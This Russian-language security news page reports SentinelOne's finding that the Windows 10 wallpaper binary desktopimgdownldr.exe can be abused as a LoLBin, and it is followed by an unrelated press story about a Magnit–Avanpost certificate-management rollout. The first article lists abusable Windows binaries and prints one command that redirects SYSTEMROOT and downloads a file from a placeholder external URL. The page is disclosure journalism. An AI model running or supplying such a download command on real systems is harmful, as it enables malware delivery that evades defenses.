Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Магнит и Avanpost внедрили систему для управления сертификатами ЭП

Розничная сеть «Магнит» совместно с Avanpost завершила проект по внедрению централизованной системы управления сертификатами электронной подписи и средствами криптографической защиты. Решение позволяет автоматизировать выпуск, продление и перевыпуск сертификатов, которые используются, в частности, для работы с ЕГАИС в торговых точках.

По данным компаний, система охватывает более 20 тысяч объектов сети на территории европейской части России и помогает снизить риски простоев при учёте и продаже алкоголя.

Под управление платформы было взято около 30 тысяч средств защиты информации, а агенты системы развернули на более чем 20 тысяч рабочих мест.

Проект предусматривает централизованное управление электронными подписями, контроль операций с ними и аудит действий сотрудников. Система также отслеживает сроки действия сертификатов и автоматически запускает процессы продления или массового перевыпуска — при необходимости до тысячи сертификатов в сутки.

Сотрудники «Магнита» получили личный кабинет, где можно дистанционно проверять статус сертификата, обновлять его или отзывать без посещения удостоверяющего центра. Возможность удалённой работы с документами реализована с учётом требований российского законодательства.

В рамках проекта Avanpost PKI интегрировали с основными корпоративными системами, включая 1С, Active Directory, КриптоПро, СМЭВ, HR MDM, а также с SIEM- и SOAR-платформами для мониторинга событий безопасности.

Срок реализации проекта — 2024-2025 годы.

Мария Дордий, руководитель отдела СКЗИ в «Магните», так описывает результаты:

«Проект по автоматизации выпуска электронных подписей в нашей розничной сети был направлен на повышение контроля, прозрачности и безопасности операций с ЭП и СКЗИ. Благодаря внедрению системы Avanpost PKI мы решили важнейшие задачи: централизовали управление СЗИ, СКЗИ и сертификатами и сократили время получения электронной подписи для наших сотрудников. Мы реализовали автоматизированные процессы одиночного и массового перевыпуска сертификатов, что критически важно для нашей масштабной сети с учетом разницы часовых поясов РФ и позволяет системе перевыпускать 1000 и более сертификатов в день. Снижение времени на получение и оперативный перевыпуск ЭП нивелирует риски простоя касс и продаж на торговых объектах. Кроме того, сотрудники получили удобный личный кабинет, позволяющий дистанционно контролировать сроки действия и обновлять сертификат. Создание гибкой ролевой модели доступа, формирование бизнес-процессов согласования, ведение журналов событий и аудит инцидентов ИБ позволили нам соблюсти требования регуляторов и контролировать нелегитимные операции, значительно повысив информационную безопасность».

Евгений Галкин, директор продуктовых направлений кибербезопасности и криптографии Avanpost, отметил:

«Автоматизация управления сертификатами для 20000 торговых объектов „Магнит“ — это по-настоящему масштабный и, что важно, уникальный для России проект. Совместно с коллегами из "Магнита" нам удалось создать централизованную систему, способную управлять сертификатами, обеспечивая их выпуск, установку на устройстве клиента с агентом Avanpost PKI, аннулирование, обновление по истечению срока и массовый перевыпуск. Мы гордимся, что построили такую систему на федеральном масштабе и фактически устранили риск остановки продаж алкоголя из-за просроченных сертификатов. В таком объеме и с такой степенью автоматизации наше решение является эксклюзивным на рынке, что подтверждает наше технологическое лидерство в сфере ретейла».

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru